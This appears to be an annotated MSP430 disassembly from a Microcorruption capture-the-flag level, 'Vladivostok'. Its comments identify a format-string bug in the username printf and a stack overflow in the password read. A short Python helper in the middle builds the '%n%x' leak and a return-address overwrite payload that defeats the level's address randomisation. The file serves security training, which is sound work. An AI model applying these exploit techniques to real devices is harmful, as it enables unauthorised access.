MicroCorruption/15-Vladivostok/Vladivostok.asm


.msp430
0010 <__trap_interrupt>
; Target of every `call #0x10` in this listing: the callers first load
; sr with (interrupt number << 8) | 0x8000 and then call here.  Nothing
; is visible at this address but the ret, so the request is presumably
; serviced on the way in (emulator behaviour — not shown in the listing).
0010: 3041 ret
; Only runs once
4400 <__init_stack>
; Reset entry: the initial stack starts at 0x4400, i.e. directly below
; this code, and grows downwards.
4400: 3140 0044 mov #0x4400, sp
4404 <__low_level_init>
; r5 = (low byte of &0x015c) | 0x5a08.  The value is written back to
; &0x015c inside the two loops that follow; 0x5a08 looks like an MSP430
; watchdog password/clear pattern — TODO confirm for this emulator.
4404: 1542 5c01 mov &0x015c, r5
4408: 75f3 and.b #-0x1, r5      ; and.b: keeps only the low byte of r5
440a: 35d0 085a bis #0x5a08, r5
440e <__do_copy_data>
; Would copy initialised data from 0x4a70+r15 to 0x2400+r15, but r15 is
; cleared just before the test, so the jz is always taken and the loop
; body below never executes.
440e: 3f40 0000 clr r15
4412: 0f93 tst r15
4414: 0724 jz $+0x10 <__do_clear_bss+0x0>
4416: 8245 5c01 mov r5, &0x015c         ; watchdog kick (see __low_level_init)
441a: 2f83 decd r15
; Author's note: the copy source (0x4a70 per the mov below) holds only zeroes.
441c: 9f4f 704a 0024 mov 0x4a70(r15), 0x2400(r15)
4422: f923 jnz $-0xc <__do_copy_data+0x8>
4424 <__do_clear_bss>
; Zero 0x32 bytes at 0x2400..0x2431 one byte at a time (r15 counts
; 0x31 down to 0; the store runs once more after dec reaches 0),
; kicking &0x015c on every iteration.  Falls through into main.
4424: 3f40 3200 mov #0x32, r15
4428: 0f93 tst r15
442a: 0624 jz $+0xe <main+0x0>
442c: 8245 5c01 mov r5, &0x015c         ; watchdog kick
4430: 1f83 dec r15
4432: cf43 0024 mov.b #0x0, 0x2400(r15)
4436: fa23 jnz $-0xa <__do_clear_bss+0x8>
rand_base_0x038: <main>
main:
;-----------------------------------------------------------------------
; main — relocates the program to a random base and jumps into the copy.
;   r11 = base  = (rand() & 0x7ffe) + 0x6000   (even, 0x6000..0xdffe)
;   r10 = second rand(), used only to offset the new stack
;   memcpy(base, 0x4400, 0x1000)  — copy the 4 KiB program image
;   sp  = base - 0x100 - (r10 & 0xffe)   (mod 0x10000; #0xff00 == -0x100)
;   call base+0x35c  (= aslr_main in the copy) with r15 = base
; Does not return normally: the call lands in aslr_main, which halts.
;-----------------------------------------------------------------------
4438: b012 1c4a call #0x4a1c <rand> ; get rand_base
443c: 0b4f mov r15, r11
443e: 3bf0 fe7f and #0x7ffe, r11          ; clear bit 15 and bit 0 -> even address
4442: 3b50 0060 add #0x6000, r11
4446: b012 1c4a call #0x4a1c <rand>
444a: 0a4f mov r15, r10
; Copy 0x1000 bytes from 0x4400 to rand_base
444c: 3012 0010 push #0x1000             ; memcpy takes all three args on the stack
4450: 3012 0044 push #0x4400
4454: 0b12 push r11
4456: b012 e849 call #0x49e8 <_memcpy>
445a: 3150 0600 add #0x6, sp              ; pop the three argument words
445e: 0f4a mov r10, r15
4460: 3ff0 fe0f and #0xffe, r15           ; even stack offset, 0..0xffe
4464: 0e4b mov r11, r14
4466: 0e8f sub r15, r14
4468: 3e50 00ff add #0xff00, r14          ; i.e. base - 0x100 - offset
446c: 0d4b mov r11, r13
446e: 3d50 5c03 add #0x35c, r13           ; relocated aslr_main
4472: 014e mov r14, sp                    ; switch to the randomised stack
4474: 0f4b mov r11, r15                   ; r15 = base, the only argument
4476: 8d12 call r13
rand_base_0x078: <__stop_progExec__>
; Halt: set the four low-power bits (0xf0) in sr and spin on this spot.
4478: 32d0 f000 bis #0xf0, sr
447c: fd3f jmp $-0x4 <__stop_progExec__+0x0>
rand_base_0x07e: <__ctors_end>
; Unconditional branch into the unexpected-interrupt handler.
447e: 3040 6e4a br #0x4a6e <_unexpected_>
rand_base_0x082: <_aslr_main>
;-----------------------------------------------------------------------
; _aslr_main(r15 = relocated code base)
; Executes from the relocated copy.  Wipes the original image at 0x4400,
; prompts for a username (8 bytes -> 0x2426), passes that buffer to the
; relocated printf (base+0x36a) as its FORMAT string, then prompts for a
; password (0x14 bytes -> stack) and hands it to the HSM interrupt.
; Frame: saved r11, r10, then 8 bytes of locals; 0x2(sp) = base+0x36a.
; All console I/O is the inlined INT pattern (push args, pc, sr; load
; sr with number<<8 | 0x8000; call #0x10; pop sr; drop 8 bytes).
; Returns r15 = sp + 2 (address of the second local word).
;-----------------------------------------------------------------------
_aslr_main: ;! args: r15
push r11
push r10
; Eight more bytes on stack
sub #0x8, sp
mov r15, r12
add #0x36a, r12                         ; r12 = relocated printf
mov r12, 0x2(sp)
clr r14
; Zero the 0x1000 bytes at 0x4400..0x53ff — the un-relocated program image.
__delete_code_loop:
mov.b #0x0, 0x4400(r14)
inc r14
cmp #0x1000, r14
jnz $-0xa <__delete_code_loop>
; "Username (8 char max):" -> 0x2402
; Built byte by byte in the bss cleared by __do_clear_bss; 0x2400 gets
; the length word (0x17) and 0x2418 the terminator.
mov.b #0x55, &0x2402
mov.b #0x73, &0x2403
mov.b #0x65, &0x2404
mov.b #0x72, &0x2405
mov.b #0x6e, &0x2406
mov.b #0x61, &0x2407
mov.b #0x6d, &0x2408
mov.b #0x65, &0x2409
mov.b #0x20, &0x240a
mov.b #0x28, &0x240b
mov.b #0x38, &0x240c
mov.b #0x20, &0x240d
mov.b #0x63, &0x240e
mov.b #0x68, &0x240f
mov.b #0x61, &0x2410
mov.b #0x72, &0x2411
mov.b #0x20, &0x2412
mov.b #0x6d, &0x2413
mov.b #0x61, &0x2414
mov.b #0x78, &0x2415
mov.b #0x29, &0x2416
mov.b #0x3a, &0x2417
mov.b #0x0, &0x2418
mov #0x17, &0x2400
mov #0x2402, r14                        ; r14 = string cursor
clr r11                                 ; r11 = 0 = putchar interrupt number
jmp $+0x22 <print_uname_string>
; Print the uname string bytewise
; Loop body: INT(0, r13) for the byte in r13, then advance r14.
__print_uname_string_l:
inc r14
sxt r13
push r11
push r13
push r11
push pc
push sr
mov r11, r15
swpb r15                                ; number << 8
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp                            ; drop the four pushed words
print_uname_string:
mov.b @r14, r13
tst.b r13
jnz $-0x24 <__print_uname_string_l>
; Print newline
__print_line_feed__1: ; putchar
clr r14                                 ; r14 = 0 stays 0 until the password prompt
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;* Print ">>"
; r13 = 0x0a + 0x34 = 0x3e = '>' — the label says "less_than" but the
; byte emitted (twice) is '>'.
__print_less_than__1: ; putchar
add #0x34, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
__print_less_than__2: ; putchar
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;! Gets 8 bytes of user input -> &0x2426
__get_uname_string: ; getsn
mov #0x8, r10                           ; max length
mov #0x2426, r11                        ; destination buffer
mov #0x2, r13                           ; interrupt 2 = getsn
push r10
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (2, 0x2426, 0x8)
pop sr
add #0x8, sp
; Calls r15+0x36a
; r14 is still 0 here: this plants a NUL right after the 8-byte buffer.
mov.b r14, &0x242e
; printf(0x2426): the user-controlled username is the FORMAT string, and
; the printf below implements %x (reads an argument word) and %n (writes
; the character count to an argument address) — a format-string bug.
; Printing it via puts, or printf with a fixed "%s" format, would not be.
push r11
call r12 ;! PRINTF???
incd sp                                 ; pop the one argument
mov r11, r15
jmp $+0x8 <clsb_a>
; Zero the username buffer 0x2426..0x2431.
__clsb_a_loop:
mov.b #0x0, 0x0(r15)
inc r15
clsb_a:
cmp #0x2432, r15
jnz $-0xa <__clsb_a_loop>
;! "Password:" -> 0x2403
; Note the byte at 0x2402 is 0x0a: the print loop below starts there, so
; a '\n' is emitted before "Password:" (the author's note reads it as a
; length; the loop treats it as a character).
mov.b #0xa, &0x2402 ; length 10
mov.b #0x50, &0x2403
mov.b #0x61, &0x2404
mov.b #0x73, &0x2405
mov.b #0x73, &0x2406
mov.b #0x77, &0x2407
mov.b #0x6f, &0x2408
mov.b #0x72, &0x2409
mov.b #0x64, &0x240a
mov.b #0x3a, &0x240b
mov.b #0x0, &0x240c
mov #0x2402, r14 ; r14 = &length
; puts ("Password:")
clr r12                                 ; r12 = 0 = putchar interrupt number
jmp $+0x22 <print_passwd_string>
__print_passwd_string:
inc r14
sxt r13
push r12
push r13
push r12
push pc
push sr
mov r12, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (0, r13)
pop sr
add #0x8, sp
print_passwd_string:
mov.b @r14, r13
tst.b r13
jnz $-0x24 <__print_passwd_string>
; Trailing newline.
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;! Get password from user -> STACK
; getsn(sp+4, 0x14): up to 20 bytes land at sp+4..sp+0x17, but the frame
; opened by `sub #0x8, sp` ends at sp+7; saved r10 (sp+8), saved r11
; (sp+0xa) and the return address (sp+0xc) are inside the write range.
; This is a stack buffer overflow — the buffer needs to be sized for
; the length passed to getsn (or the length capped at the buffer size).
__get_pass_string: ; getsn
mov sp, r11
add #0x4, r11                           ; r11 = destination = sp+4
mov #0x14, r12                          ; max length 20
mov #0x2, r13                           ; interrupt 2 = getsn
push r12
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (2, )
0x2aa:
pop sr
add #0x8, sp
;! Check password with HSM-2
; r13 = 2 + 0x7c = 0x7e: INT(0x7e, buffer, sp) — the same interrupt the
; library conditional_unlock_door below uses, with r12 = sp as the
; result slot.  Nothing afterwards branches on that slot; "Wrong!" is
; printed on every path, so any unlocking must happen inside the
; interrupt itself (not visible here).
__check_password: ; conditional_unlock_door
add #0x7c, r13
mov sp, r12
push r12
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
; "Wrong!" -> 0x2402
mov.b #0x57, &0x2402
mov.b #0x72, &0x2403
mov.b #0x6f, &0x2404
mov.b #0x6e, &0x2405
mov.b #0x67, &0x2406
mov.b #0x21, &0x2407
mov.b r14, &0x2408 ; Hah, nice hint: r14 still 0
mov #0x7, &0x2400 ; length: 7
;* puts
mov #0x2402, r13                        ; this time r13 is the cursor, r12 the byte
jmp $+0x22 <_aslr_main+0x2a2>
__print_wrong_string: ; puts ("Wrong!")
inc r13
sxt r12
push r14
push r12
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
print_wrong_string:
mov.b @r13, r12
tst.b r12
jnz $-0x24 <_aslr_main+0x282>
; print newline
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
mov sp, r14
; r15 = ++r14
; Return value r15 = sp + 2 (address of the local that held base+0x36a).
incd r14
push r14
pop r15
4754:
; Epilogue: drop the 8-byte frame, restore r10/r11.  The ret uses the
; return address at the former sp+0xc, which the password read above
; can overwrite.
add #0x8, sp
pop r10
pop r11
ret
rand_base_0x35c: <aslr_main>
aslr_main:
;-----------------------------------------------------------------------
; aslr_main(r15 = relocated base): call base+0x82 (_aslr_main in the
; copy) with r15 unchanged, then halt by setting the low-power bits.
; The ret is only reached if the halt does not take effect.
;-----------------------------------------------------------------------
475c: 0e4f mov r15, r14
475e: 3e50 8200 add #0x82, r14
4762: 8e12 call r14
; SR |= 0x00f0
4764: 32d0 f000 bis #0xf0, sr
4768: 3041 ret
aslr_base_0x36a: <printf>
printf:
;-----------------------------------------------------------------------
; printf(fmt, ...) — every argument is on the stack:
;   0x2(r4) = fmt,  0x4(r4), 0x6(r4), ... = variadic words,
;   r4 = sp at entry (after the 7 pushes, sp + 0xe).
; Pass 1 counts '%' directives in fmt ("%%" does not count) and copies
; that many argument words into a scratch area on the stack (r11).
; Pass 2 walks fmt and emits characters with INT(0, c):
;   %%  prints '%'                %s  prints the string the next arg points to
;   %x  prints 4 hex digits of    %n  stores the running character count
;       the next arg word             (r12) at the address in the next arg
; Any other directive prints nothing but still consumes one argument.
; Registers: r10 = fmt cursor, r11 = next argument word, r12 = characters
; written, r7 = '%', r6 = 9 (hex digit/letter threshold), r9 = nibble
; counter, r13 = 0 (interrupt number), r4 = frame.  Callee-saved r4 and
; r6..r11 are preserved; sp is restored from the slot at -0x10(r4).
; %n is a write to an argument-supplied address and %x a read of an
; argument word: only ever call this with a trusted, fixed fmt.
;-----------------------------------------------------------------------
; Save registers
push r11
push r10
push r9
push r8
push r7
push r6
push r4
; Create a new stack frame of 0xe bytes
mov sp, r4
add #0xe, r4                            ; r4 = sp at entry: 0(r4) = return address
; Get the first argument
decd sp                                 ; one local word; receives the saved sp
mov 0x2(r4), r10                        ; r10 = fmt
mov sp, -0x10(r4)                       ; remember sp so the epilogue can unwind
mov r10, r15                            ; r15 = pass-1 cursor
clr r14                                 ; r14 = number of directives
jmp $+0x18 <__target_1> +3a
; Pass 1 loop: on '%' look at the next byte — a second '%' is skipped
; as a literal, anything else counts as one directive.
inc r15
cmp.b #0x25, r13
jnz $+0x10 <__target_1> +3a
cmp.b @r15, r13
jnz $+0x8 <__target_2> +36
__target_4:
inc r15
clr r13
jmp $+0x4 <__target_3> +38
__target_2:
mov #0x1, r13
add r13, r14
__target_3:
mov.b @r15, r13
tst.b r13
jnz $-0x1a <__target_4> +24
; Reserve 2*count + 2 bytes and copy the argument words there (r11).
mov r14, r15
add r15, r15
incd r15
sub r15, sp
mov sp, r11
mov r4, r12
add #0x4, r12                           ; r12 = first variadic argument
mov sp, r15
clr r13
jmp $+0xc <printf+0x5e>
mov @r12, 0x0(r15)
inc r13
incd r15
incd r12
cmp r14, r13
jl $-0xc <printf+0x54>                  ; signed compare; counts are small
; Pass 2 setup.
clr r12                                 ; r12 = characters written so far
mov #0x9, r6
mov r12, r13
mov #0x25, r7
jmp $+0xf8 <printf+0x166>
; Pass 2 loop body: r15 = current fmt byte, r10 already advanced.
inc r10
cmp.b #0x25, r15
jz $+0x26 <printf+0x9c>
inc r12
; Literal character: INT(0, r15).
__target_1:
mov.b r15, r14
sxt r14
push r13
push r14
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
jmp $+0xcc <printf+0x166>
; Directive: r14 = byte after '%'.
mov.b @r10, r14
cmp.b r15, r14
jnz $+0x22 <printf+0xc2>
; "%%" -> print one '%' (r7) and count it.
inc r12
push r13
push r7
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
jmp $+0xa2 <printf+0x162>
cmp.b #0x73, r14
jnz $+0x32 <printf+0xf8>
; "%s": r14 = string pointer from the argument area; print to NUL,
; counting each byte in r12.
mov @r11, r14
clr r8
jmp $+0x24 <printf+0xf0>
inc r12
inc r14
sxt r9
push r8
push r9
push r8
push pc
push sr
mov r8, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
mov.b @r14, r9
tst.b r9
jnz $-0x26 <printf+0xce>
jmp $+0x6c <printf+0x162>
cmp.b #0x78, r14
jnz $+0x5a <printf+0x156>
; "%x": r14 = argument word; emit its 4 nibbles, high first.
mov @r11, r14
mov #0x4, r9
jmp $+0x4a <printf+0x14c>
mov r14, r15
swpb r15                                ; high byte into the low byte
and #0xff, r15
clrc
rrc r15                                 ; >> 4 in total: r15 = top nibble (0..15)
rra r15
rra r15
rra r15
cmp r15, r6
jl $+0xa <printf+0x122>                 ; taken when nibble > 9
mov r15, r8
add #0x30, r8                           ; '0'..'9'
jmp $+0x8 <printf+0x128>
mov r15, r8
add #0x57, r8                           ; 'a'..'f'
push r13
push r8
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
add r14, r14                            ; r14 <<= 4: next nibble to the top
add r14, r14
add r14, r14
add r14, r14
add #-0x1, r9
cmp #-0x1, r9
jnz $-0x4c <printf+0x104>
add #0x4, r12                           ; four characters written
jmp $+0xe <printf+0x162>
cmp.b #0x6e, r14
jnz $+0x8 <printf+0x162>
; "%n": store the character count at the address held in the argument.
mov @r11, r15
mov r12, 0x0(r15)
; Shared tail of every directive: next argument, next fmt byte.
incd r11
inc r10
; Loop condition: continue while the fmt byte in r15 is non-zero.
mov.b @r10, r15
tst.b r15
jnz $-0xfa <printf+0x70>
; Epilogue: unwind the variable-size argument copy and the local word.
mov -0x10(r4), sp
incd sp
pop r4
pop r6
pop r7
pop r8
pop r9
pop r10
pop r11
ret
;;;
def bypass (printf_loc):
    """Writeup helper: given the address at which the relocated printf was
    observed, recover the randomized base (printf sits at base+0x36a in the
    listing above) and print, hex-encoded, the two inputs the writeup feeds
    to the binary.  The semicolon on the first line is redundant in Python.
    """
    aslr_base = printf_loc - 0x36a;
    print(b'%n%x'.hex())
    print(f"{b'AAAA1011'.hex()}{aslr_base+0x56c:x}7f7f{aslr_base+0x4f4:x}")
;;;
aslr_base_0x4ec: <_INT>
_INT:
;-----------------------------------------------------------------------
; _INT: raise the interrupt whose number is the first stack argument
; (0x2(sp), just above the return address).  Unlike INT below it pushes
; only sr, not pc, and leaves the arguments for the caller to pop.
; The aslr_base_0x4f4 label marks the swpb inside the body.
;-----------------------------------------------------------------------
48ec: 1e41 0200 mov 0x2(sp), r14
48f0: 0212 push sr
48f2: 0f4e mov r14, r15
aslr_base_0x4f4:
48f4: 8f10 swpb r15                     ; number << 8
48f6: 024f mov r15, sr
48f8: 32d0 0080 bis #0x8000, sr
48fc: b012 1000 call #0x10
4900: 3241 pop sr
4902: 3041 ret
aslr_base_0x504: <INT>
INT:
;-----------------------------------------------------------------------
; INT(r15 = number, r14, r13): generic interrupt wrapper.
; Pushes r13, r14, number, pc, sr; loads sr with number<<8 | 0x8000;
; calls the trap at 0x10; restores sr and drops the four pushed words.
; Clobbers r12, r15; no defined return value.
;-----------------------------------------------------------------------
4904: 0c4f mov r15, r12
4906: 0d12 push r13
4908: 0e12 push r14
490a: 0c12 push r12
490c: 0012 push pc
490e: 0212 push sr
4910: 0f4c mov r12, r15
4912: 8f10 swpb r15
4914: 024f mov r15, sr
4916: 32d0 0080 bis #0x8000, sr
491a: b012 1000 call #0x10
491e: 3241 pop sr
4920: 3152 add #0x8, sp
4922: 3041 ret
aslr_base_0x524: <putchar>
putchar:
;-----------------------------------------------------------------------
; putchar(r15 = c): INT(0, c, 0).  Returns r15 = c.
; Clobbers r13, r14.
;-----------------------------------------------------------------------
4924: 0e4f mov r15, r14
4926: 0d43 clr r13                      ; interrupt 0, also the third word
4928: 0d12 push r13
492a: 0e12 push r14
492c: 0d12 push r13
492e: 0012 push pc
4930: 0212 push sr
4932: 0f4d mov r13, r15
4934: 8f10 swpb r15
4936: 024f mov r15, sr
4938: 32d0 0080 bis #0x8000, sr
493c: b012 1000 call #0x10
4940: 3241 pop sr
4942: 3152 add #0x8, sp
4944: 0f4e mov r14, r15                 ; return the character
4946: 3041 ret
aslr_base_0x548: <getchar>
getchar:
;-----------------------------------------------------------------------
; getchar(): INT(1, &local, 0) with a one-word local on the stack, then
; returns r15 = sign-extended low byte of that local.
; Clobbers r12, r13, r14.
;-----------------------------------------------------------------------
4948: 2183 decd sp                      ; local word that receives the byte
494a: 0d43 clr r13
494c: 1e43 mov #0x1, r14                ; interrupt 1
494e: 0c41 mov sp, r12                  ; &local
4950: 0d12 push r13
4952: 0c12 push r12
4954: 0e12 push r14
4956: 0012 push pc
4958: 0212 push sr
495a: 0f4e mov r14, r15
495c: 8f10 swpb r15
495e: 024f mov r15, sr
4960: 32d0 0080 bis #0x8000, sr
4964: b012 1000 call #0x10
4968: 3241 pop sr
496a: 3152 add #0x8, sp
496c: 6f41 mov.b @sp, r15
496e: 8f11 sxt r15                      ; sign-extend the byte
4970: 2153 incd sp                      ; release the local
4972: 3041 ret
aslr_base_0x574: <getsn>
getsn:
;-----------------------------------------------------------------------
; getsn(r15 = buf, r14 = len): INT(2, buf, len).  No return value;
; the caller is responsible for len not exceeding the buffer.
; Clobbers r12, r13, r15.
;-----------------------------------------------------------------------
4974: 0d4f mov r15, r13
4976: 2c43 mov #0x2, r12                ; interrupt 2
4978: 0e12 push r14
497a: 0d12 push r13
497c: 0c12 push r12
497e: 0012 push pc
4980: 0212 push sr
4982: 0f4c mov r12, r15
4984: 8f10 swpb r15
4986: 024f mov r15, sr
4988: 32d0 0080 bis #0x8000, sr
498c: b012 1000 call #0x10
4990: 3241 pop sr
4992: 3152 add #0x8, sp
4994: 3041 ret
aslr_base_0x596: <puts>
puts:
;-----------------------------------------------------------------------
; puts(r15 = s): emit each byte of s up to the NUL with INT(0, c), then
; a newline.  Returns r15 = 0.  Clobbers r12, r13, r14.
;-----------------------------------------------------------------------
4996: 0e4f mov r15, r14                 ; r14 = cursor
4998: 0c43 clr r12                      ; interrupt 0
499a: 103c jmp $+0x22 <puts+0x26>
; Loop body: INT(0, r13), advance cursor.
499c: 1e53 inc r14
499e: 8d11 sxt r13
49a0: 0c12 push r12
49a2: 0d12 push r13
49a4: 0c12 push r12
49a6: 0012 push pc
49a8: 0212 push sr
49aa: 0f4c mov r12, r15
49ac: 8f10 swpb r15
49ae: 024f mov r15, sr
49b0: 32d0 0080 bis #0x8000, sr
49b4: b012 1000 call #0x10
49b8: 3241 pop sr
49ba: 3152 add #0x8, sp
; Loop condition: current byte non-zero.
49bc: 6d4e mov.b @r14, r13
49be: 4d93 tst.b r13
49c0: ed23 jnz $-0x24 <puts+0x6>
; Trailing '\n'.
49c2: 0e43 clr r14
49c4: 3d40 0a00 mov #0xa, r13
49c8: 0e12 push r14
49ca: 0d12 push r13
49cc: 0e12 push r14
49ce: 0012 push pc
49d0: 0212 push sr
49d2: 0f4e mov r14, r15
49d4: 8f10 swpb r15
49d6: 024f mov r15, sr
49d8: 32d0 0080 bis #0x8000, sr
49dc: b012 1000 call #0x10
49e0: 3241 pop sr
49e2: 3152 add #0x8, sp
49e4: 0f4e mov r14, r15                 ; r14 is 0 here: return 0
49e6: 3041 ret
aslr_base_0x5e8: <_memcpy>
memcpy:
;-----------------------------------------------------------------------
; memcpy(dst, src, len) — all three on the stack: 0x2(sp) = dst,
; 0x4(sp) = src, 0x6(sp) = len.  Byte-by-byte copy; len == 0 copies
; nothing.  The loop re-reads dst/src from the stack each iteration.
; Clobbers r12..r15; no return value.
;-----------------------------------------------------------------------
49e8: 1c41 0600 mov 0x6(sp), r12        ; r12 = len
49ec: 0f43 clr r15                      ; r15 = index
49ee: 093c jmp $+0x14 <_memcpy+0x1a>
49f0: 1e41 0200 mov 0x2(sp), r14
49f4: 0e5f add r15, r14                 ; r14 = dst + i
49f6: 1d41 0400 mov 0x4(sp), r13
49fa: 0d5f add r15, r13                 ; r13 = src + i
49fc: ee4d 0000 mov.b @r13, 0x0(r14)
4a00: 1f53 inc r15
4a02: 0f9c cmp r12, r15
4a04: f523 jnz $-0x14 <_memcpy+0x8>
4a06: 3041 ret
aslr_base_608: <_bzero>
bzero:
;-----------------------------------------------------------------------
; bzero(r15 = p, r14 = len): write len zero bytes starting at p.
; len == 0 writes nothing.  Clobbers r12, r13; no return value.
;-----------------------------------------------------------------------
4a08: 0d43 clr r13                      ; r13 = index
4a0a: 053c jmp $+0xc <_bzero+0xe>
4a0c: 0c4f mov r15, r12
4a0e: 0c5d add r13, r12                 ; r12 = p + i
4a10: cc43 0000 mov.b #0x0, 0x0(r12)
4a14: 1d53 inc r13
4a16: 0d9e cmp r14, r13
4a18: f923 jnz $-0xc <_bzero+0x4>
4a1a: 3041 ret
aslr_base_0x61c: <rand>
rand:
;-----------------------------------------------------------------------
; rand(): INT(0x20, 0, 0).  Returns r15; the `mov r15, r15` before the
; ret is a no-op, so r15 is presumably already set by the interrupt —
; cannot be confirmed from the listing.  Clobbers r13, r14.
;-----------------------------------------------------------------------
4a1c: 0e43 clr r14
4a1e: 3d40 2000 mov #0x20, r13          ; interrupt 0x20
4a22: 0e12 push r14
4a24: 0e12 push r14
4a26: 0d12 push r13
4a28: 0012 push pc
4a2a: 0212 push sr
4a2c: 0f4d mov r13, r15
4a2e: 8f10 swpb r15
4a30: 024f mov r15, sr
4a32: 32d0 0080 bis #0x8000, sr
4a36: b012 1000 call #0x10
4a3a: 3241 pop sr
4a3c: 3152 add #0x8, sp
4a3e: 0f4f mov r15, r15                 ; no-op
4a40: 3041 ret
aslr_base_0x642: <conditional_unlock_door>
conditional_unlock_door:
;-----------------------------------------------------------------------
; conditional_unlock_door(r15 = password): INT(0x7e, password, &local)
; with a one-word local as the result slot.  The local is never read
; back: r15 is cleared unconditionally, so this always returns 0 and
; the caller cannot learn the outcome from the return value.
; Clobbers r12, r13, r14.
;-----------------------------------------------------------------------
4a42: 2183 decd sp                      ; result slot
4a44: 0e4f mov r15, r14
4a46: 3d40 7e00 mov #0x7e, r13          ; interrupt 0x7e
4a4a: 0c41 mov sp, r12                  ; &local
4a4c: 0c12 push r12
4a4e: 0e12 push r14
4a50: 0d12 push r13
4a52: 0012 push pc
4a54: 0212 push sr
4a56: 0f4d mov r13, r15
4a58: 8f10 swpb r15
4a5a: 024f mov r15, sr
4a5c: 32d0 0080 bis #0x8000, sr
4a60: b012 1000 call #0x10
4a64: 3241 pop sr
4a66: 3152 add #0x8, sp
4a68: 0f43 clr r15                      ; return 0 regardless of the result slot
4a6a: 2153 incd sp                      ; release the local
4a6c: 3041 ret
4a6e <_unexpected_>
; Unexpected-interrupt handler: a bare return from interrupt.
4a6e: 0013 reti pc